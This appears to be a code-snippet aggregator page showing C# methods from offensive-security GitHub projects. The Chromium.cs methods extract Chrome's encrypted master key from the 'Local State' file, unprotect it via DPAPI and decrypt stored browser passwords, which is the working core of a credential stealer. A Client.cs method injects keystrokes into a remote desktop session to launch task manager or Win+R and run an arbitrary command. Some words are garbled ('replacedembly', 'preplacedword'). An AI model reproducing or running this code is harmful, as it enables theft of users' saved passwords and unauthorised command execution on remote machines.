			foreach (var basePath in searchPaths) {
				foreach (var ext in asmExtensions) {
					var filename = Path.Combine(basePath, name + ext);
					if (File.Exists(filename)) {
						asm = replacedembly.LoadFile(filename);
						nameToreplacedembly[name] = asm;
						return asm;
					}
				}
			}
			if (!name.EndsWith(".resources", StringComparison.OrdinalIgnoreCase))
				Console.WriteLine($"Failed to resolve replacedembly '{name}'");
			return null;
		}

19 Source : Chromium.cs
with GNU General Public License v3.0
from 0xfd3

public static string DecryptWithKey(byte[] encryptedData, byte[] MasterKey)
        {
            byte[] iv = new byte[] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; // IV 12 bytes

            //trim first 3 bytes(signature "v10") and take 12 bytes after signature.
            Array.Copy(encryptedData, 3, iv, 0, 12);

            try
            {
                //encryptedData without IV
                byte[] Buffer = new byte[encryptedData.Length - 15];
                Array.Copy(encryptedData, 15, Buffer, 0, encryptedData.Length - 15);

                byte[] tag = new byte[16]; //AuthTag
                byte[] data = new byte[Buffer.Length - tag.Length]; //Encrypted Data

                //Last 16 bytes for tag
                Array.Copy(Buffer, Buffer.Length - 16, tag, 0, 16);

                //encrypted preplacedword
                Array.Copy(Buffer, 0, data, 0, Buffer.Length - tag.Length);

                AesGcm aesDecryptor = new AesGcm();
                var result = Encoding.UTF8.GetString(aesDecryptor.Decrypt(MasterKey, iv, null, data, tag));

                return result;
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.ToString());
                return null;
            }
        }

19 Source : Chromium.cs
with GNU General Public License v3.0
from 0xfd3

public static byte[] GetMasterKey(string LocalStateFolder)
        {
            //Key saved in Local State file
            string filePath = LocalStateFolder + @"\Local State";
            byte[] masterKey = new byte[] { };

            if (File.Exists(filePath) == false)
                return null;

            //Get key with regex.
            var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath));

            foreach (System.Text.RegularExpressions.Match prof in pattern)
            {
                if (prof.Success)
                    masterKey = Convert.FromBase64String((prof.Groups[1].Value)); //Decode base64
            }

            //Trim first 5 bytes. Its signature "DPAPI"
            byte[] temp = new byte[masterKey.Length - 5];
            Array.Copy(masterKey, 5, temp, 0, masterKey.Length - 5);

            try
            {
                return ProtectedData.Unprotect(temp, null, DataProtectionScope.CurrentUser);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.ToString());
                return null;
            }
        }

19 Source : Client.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen

private void RunRun()
        {
            if(runtype == "taskmgr")
            {
                Console.WriteLine("[+] Running task manager");
                Thread.Sleep(500);
                SendText("taskmgr");
                Thread.Sleep(1000);

                Thread.Sleep(500);
                SendElement("Enter+down");
                Thread.Sleep(500);
                SendElement("Enter+up");

                SendElement("Alt+F");
                Thread.Sleep(1000);

                SendElement("Enter+down");
                Thread.Sleep(500);
                SendElement("Enter+up");
                Thread.Sleep(500);
            }

            Console.WriteLine("[+] Executing {0}", cmd.ToLower());
            SendText(cmd.ToLower());
            Thread.Sleep(1000);

            if (runtype == "taskmgr")
            {
                SendElement("Tab");
                Thread.Sleep(500);
                SendElement("Space");
                Thread.Sleep(500);
            }

            if(runtype == "winr")
            {
                //Currently bugged - does not run elevated
                SendElement("Ctrl+Shift+down");
                Thread.Sleep(500);
                SendElement("Enter+down");
                Thread.Sleep(250);
                SendElement("Enter+up");
                Thread.Sleep(500);
                SendElement("Ctrl+Shift+up");
                Thread.Sleep(500);
            }
            else
            {
                SendElement("Enter+down");
                Thread.Sleep(500);
                SendElement("Enter+up");
                Thread.Sleep(250);
            }

            if (isdrive == true)
            {
                SendElement("Left");
                Thread.Sleep(500);
                SendElement("Enter+down");
                Thread.Sleep(500);
                SendElement("Enter+up");
            }
            
            if (runtype == "winr")
            {
                SendElement("Left");
                Thread.Sleep(500);
                SendElement("Enter+down");
                Thread.Sleep(500);
                SendElement("Enter+up");
            }
            if (runtype == "taskmgr")
            {
                Thread.Sleep(250);
                SendElement("Alt+F4");
            }
        }

See More Examples